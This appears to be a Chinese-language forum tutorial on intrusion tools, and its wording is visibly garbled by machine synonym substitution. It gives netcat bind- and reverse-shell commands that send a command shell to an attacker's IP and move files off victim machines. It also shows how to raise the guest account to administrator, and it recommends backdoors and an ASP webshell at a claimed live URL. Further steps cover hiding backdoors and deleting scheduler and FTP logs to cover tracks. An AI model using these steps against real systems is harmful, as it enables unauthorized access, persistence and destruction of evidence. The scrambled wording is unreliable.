常用黑客工具的使用方法集锦

常用黑客工具的使用方法集锦常用黑客工具的使用方法集锦!!一.nc(netcat)的运用本领!贯穿到某处：nc [-options] hostname port[s] [ports].....监听某端口等候贯穿：nc -l -p port [options] [hostname] [port] -options -d 后盾运转-e prog 步调重定向，一旦有贯穿，就实行绑定的步调。-g gateway source-routing hop point[s], up to 8-g num source-routing pointer: 4, 8, 12, ...-h 扶助消息-i 设定延时功夫。-l 监听办法，等候连入。贯穿实行后，中断监听。 -l 监听办法，等候连入。贯穿实行后，连接监听。-n 只能运用ip地方。-o file 指定要传递的16进制代码。-p port 指定当地的端标语。-r 随便指定当地或长途端标语。-s addr 当地的源地方。-t 回显telnet消息。-u udp办法。-v 表露精细的消息，-vv 可获得更精细的消息。-w 指定超时的功夫。-z 用来scan。之上即是nc的少许参数和选项，提防，这是nt本子的nc。即使是*nix的须要本人编写翻译。也都差不离，不过netcat.c默许是没有-t和-e这个两个参数，要改。看看它才干些什么，（偶就领会那些）1.端口的探听：nc -vv ip port2.扫描器nc -v -w 5 ip port-portnc -v -z ip port-port3. 方便之门victim machine:nc -l -p port -e cmd.exenc -l -p port -e /bin/shattacker machine:nc victim ip -p port获得一个shell。4.反向贯穿attacker machine:nc -vv -l -p port victim machine:nc -e cmd.exe attacker ip -p portnc -e /bin/sh attacker ip -p port大概：attacker machine:nc -vv -l -p port1 /*用来输出*/nc -vv -l -p prot2 /*用来表露*/victim machine:nc attacker ip port1 | cmd.exe | nc attacker ip port2nc attacker ip port1 | /bin/sh | nc attacker ip port25.传递文献：attacker machine <-- victim machinenc -d -l -p port < path file /*attacker machine*/nc -vv attacker ip -p port > path file /*victim machine*/attacker machine --> victim machine nc －vv -l -p > patm file/*victim machine*/nc -d victim ip -p port < path file /*attacker machine*/6.telnet工具备些方便之门须要在每个吩咐后加";"，让人很老火。用nc去连，就不妨制止。即使你仍旧篡夺了确定的权力，比方，可写的！ 那么应用底下两个软硬件，不妨简单的帮你侵犯： dntucli.exe dntus26.exe 在吩咐提醒下运转： d:\>dntucli.exe usage: dntucli.exe <\\server> dntucli.exe \\machinename (remote server is \\machinename) dntucli.exe \\. (local server) copyright (c) 1991-2001 dameware development www.dameware.com 当你输出ip的功夫会让你输出用户和暗号！ 只有对方开了rpc并且你的用户有可写的权力的话！！ 就会复制同一目次下的dntus26.exe，这种步调是本人安置并且本人翻开效劳的！ 而后你就不妨径直贯穿到对方的c了！ 这种软硬件有cmd重定向功效··· 而后你就随意想做你的任何工作了！ c:\>net user \\fynet33 的用户帐户 ---------------------------------- administrator      guest 吩咐胜利实行。 c:\>net user guest /active:yes 吩咐胜利实行。 c:\>net user guest wry 吩咐胜利实行。 c:\>net user localgroup administratorsguest/add 吩咐胜利实行。 这个功夫你的guest仍旧是处置员了！！即使你遏止了net.exe大概被简略了你不妨用 ftp吩咐下一个net.exe大概其余一个软硬件adduser.exe 用法： d:\>addusers.exe addusers {/c|/d{:u}|/e} filename [/t][/s:x] [/?] [\\computername|domainname] [/p :{l|c|e|d}] error: too few arguments 此刻你即是处置员了！假如发觉还不是很爽！呵呵！那么全力进它的里面搜集吧！！ 看： 一，加入第一台假如平台的nt效劳器 经过大略的扫描器，只需带有大略暗号考证的哪些就已充满扫出那些提防教差的呆板。 常常的用户名不是空即是沟通。 绑定netbeui和议的nt平台有个沉重的缺点承诺报复者获得当地用户名列表 及沿用暴力法连接考证她们的暗号 。 而后，即是由于网管在认识上的不关心，报复者简直不需花很大的力量就能找到那些用户名和暗号沟通的 或暗号为空的效劳器。 二，报复者遏制效劳器文献体例 有了暗号对侵犯者来说，一致不是她们的最后手段！ 隐射为当地盘，当侵犯者获得你adminitrator组的任何一个分子的暗号，大概是个普遍用户的暗号 这边我把简直吩咐cut了！ 1，是administrator的分子时简直不妨隐射你大肆一个盘。 2，普遍用户将运用百般大概的时机获得更多的消息或径直运用web hole来获得更大的权力。 典范的手法有：运用web asp的功效！遏制你所有硬盘 （提防iis的少许已知的缺点 upload.asp)。 提防：运用asp 功效，报复者同样能遏制你硬盘上的大普遍的文献（everyone的文献） 三，起动任何她们想要登时运转的步调 普遍来说登时启用对nt来说是比拟艰巨的，固然有些侵犯者会写几句吩咐，而后等候效劳珍视新 启用时，他的步调也将得以运转，然而我想对于大普遍的报复者来说，她们不会有那么好的细心 她们会登时启用她们的货色（大概是些方便之门跷跷板）。 在nt iis的web摆设里有个选项是实行--------伤害 报复者将运用他遏制你文献体例的任何一种本领把他要启用的步调放到那些承诺实行的目次里去 而后她们将 http://www.xxx.com/cgi-bin/xxx.exe 运用web 启用该文献。 指出：iis 默许的少许目次带有可实行的权力 /script/tools/ .... 对于少许低级侵犯者来说，她们常常启用的是些方便之门跷跷板，而后对于那些体味充分的侵犯者 他大概对遏制你一台呆板仍旧显得毫无爱好，她们大概真实的手段是遏制你的所有网段。 这边犯得着提防的是，那些侵犯者将会启用一个 同等于telnet shell for nt的货色 netcat ncx99.exe将在nt的99段口打开一个telnet效劳端过程，等代报复者的登岸 四，登岸博得最高权力 登岸后的侵犯者在远端效劳器并不具备最高的权力，她们将沿用少许nt当地溢出形成admin 个中驰名的步调是getadmin.exe 五，简略日记记载 任何一个侵犯者都领会养护她们本人！以是简略日记记载对她们来说是件很要害的事在这边 我倡导网管沿用第二硬备份或沿用第三方日记记载体例。 因为nt的日记文献是当进步程运转操纵的文献，他是按照功夫来连接换新的操纵文献的 任何人囊括admin在前是无权简略或变动的。 而这边有个大略的不许在大略的道理，侵犯者在博得admin权力后经过变动体例功夫！让日记 记载过程转而记载另一个文献，而后变动他想变动的谁人日记文献。 六，加入你的里面网 因为报复者登岸你的 shell ，此时的他所具备的ip 同等于你这台呆板上的里面地方 ftp 198.162.1.2 telnet 127.0.0.3 net view net use * \\ 都将在她们的手里形成侵犯你里面网的东西，经过暗射，而后在 cd z: 同声上述的报复本领将再一次在里面网重演，扫描，破译，登岸。里面搜集的速率将比长途 快很多，这偶尔给侵犯者暴力破译翻开了简单之门。 七，更多本领 大概话！她们会做十足你想不到的事!监听，ip捉弄。。。。。 然而，嗅探的本领是不大概在调换机的搜集里抓到消息的！纵然在里面搜集里，咱们的 目的即是拿到对方的暗号才不妨有考察的权力！ 即使你幸运的有权力加到了域处置员！那么之上的都不要了！ 我在把２０００和nt下的方便之门拿出来说一下子： 怎样做个好方便之门是很要害的； １》引荐为小榕的remotenc，remotenc beta 4 长途安置于nt／2000，供给cmd重定向功效 由于它具备cmd的重定向，也即是挪用了对方的cmd，以是不妨穿过纵火墙反面的长机，传播消息然而必需要是administrator的身份安置 独一的不好的，此刻这个软硬件仍旧被加入了宏病毒的队伍了！我收缩了后，又被最新的kv3000杀死了！ ２》此刻引荐为蓝色火苗，暂时还没有被查杀了，扶助ftp，telnet等多种办法！既是你仍旧赢得了处置员权力了！ 那么复制到对方的admin4\system32改一个湮没的名字！！ 而后用at吩咐大概径直用remotenc启用！，这个软硬件方便之门独一不长处没有和exe关系！ 很简单被简略的！ ３》引荐为asp跷跷板。这种跷跷板长久不会被查杀！上传到对方长机有可实行的asp的目次下！ 径直不妨在欣赏器上径直运转的！ 比方： http://www.fibrlink.com/flink/apply/cmdasp.asp 这个站点，我做的asp跷跷板，到我写的功夫，仍旧不妨用的！蓄意大师不过用来尝试！ 4》引荐为tini.exe这个方便之门软硬件，传闻是长久不会被查杀的软硬件，由于它用的是window的shell通道！！呵呵！然而，我在尝试的功夫仍旧会被最新的锘盾杀死的！ 复制到对方长机上，运转后 就不妨telnet对方的７７７７断口了！ 怎样把本人的方便之门步调湮没的比拟好？ １。取比拟和体例文献的名字，比方：asp.exe处置员在简略的功夫就的商量了！ ２。用attrib湮没文献了。然而如许不过外表的湮没！ ３。应用少许活路的步调，比方：explorer.exe普遍的这个步调都是在键值shell下的！ 历次城市运转的！那么历次你的方便之门步调城市启用！ ４。湮没在数据流里！（稍后引见） 方便之门做好了，不要高枕无忧了！还要简略了本人的记载！ windows2000的日记文献常常有运用步调日记，安成天志、体例日记、smtp效劳器日记,dns效劳器日记、ftp日记、www日记之类，大概会按照效劳器所打开的效劳各别而有所各别。再有少许搜集处置软硬件的日记，说到这边，牢记新浪的网管软硬件是本人开拓的，即使不领会这个，大概会留住更多的记载！！！ 1) scheduler日记 scheduler效劳日记默许场所：2000下: %sys temroot%\schedlgu.txt ntworkstation下为 schedlog.txt 不妨翻开schedlgu.txt schedluler效劳日记在备案表中 hkey_local_machine\software\microsoft\schedulingagent 先停掉他 net stop "task scheduler" (提防不停是删不掉的) 而后再 del schedlgu.txt 或 schedlog.txt之后就ok了. del sched*.txt 然而你即使不想删他,也不妨改改它. 他的实质是如许的: " "工作安置步调效劳" 已退出于 01-5-22 20:37:34 "工作安置步调效劳" 已启用于 01-5-25 7:07:37 "工作安置步调效劳" 已启用于 01-5-25 7:26:36 "工作安置步调效劳" 已退出于 01-5-25 8:47:54 " 很好改的. (2) ftp日记 internet消息效劳ftp日记默许场所：%sys temroot%\sys tem32\logfiles\msftpsvc1\，默许每天一个日记. 方法是如许的 ex*.log . 提防这是一台nt4的logfiles下的文献: 这台效劳器下处置有多个http或ftp站点 c:\winnt\sys tem32\logfiles 的目次 00-12-04 06:28p . 00-12-04 06:28p .. 01-05-18 12:56p msftpsvc1 01-04-23 11:28a msftpsvc2 01-01-12 11:56a msftpsvc3 01-06-01 08:12a smtpsvc1 01-09-20 08:55a w3svc1 01-08-02 10:36a w3svc10 01-10-11 04:48p w3svc11 01-07-11 09:16a w3svc2 01-10-11 10:31a w3svc3 01-10-10 04:55p w3svc4 01-09-28 01:43p w3svc5 01-10-11 08:44a w3svc6 01-10-11 08:00a w3svc7 01-09-30 01:49p w3svc8 01-10-11 08:03a w3svc9 看看日记文献的方法: c:\winnt\sys tem32\logfiles\msftpsvc1\in010306.log 192.168.5.8, anonymous, 01-3-6, 16:41:51, msftpsvc1, appserver, 192.168.5.8, 0, 0, 0, 331, 0, [3]user, anonymous, -, 192.168.5.8, -, 01-3-6, 16:41:51, msftpsvc1, appserver, 192.168.5.8, 0, 0, 0, 53 0, 1326, [3]pass, ie30user@, -, 法一:> 这个时侯 net stop msftpsvc 停掉后盾效劳. 而后纵然 del ............ 看这删吧,不要删的过分,把当天的删了就行. 别忘了再net start msftpsvc 把效劳翻开. 法二:> 固然你即使还想更好,那就改改日记,不妨改了体例功夫后再改日记,只把你的清了,别忘了把功夫改回顾哦 本质上在获得admin权力后,做那些事很简单. 法三 最白痴的清ftp日记的本领, cleaniislog ！！ 之上，不免有缺点之处，由于俺也是个很菜的鸟，请能手指教！有的场合，我懒的写就径直拿过来了！蓄意作家包容！作品也很错落，重要俺也是个很懒的人。只求菜鸟们能领会 !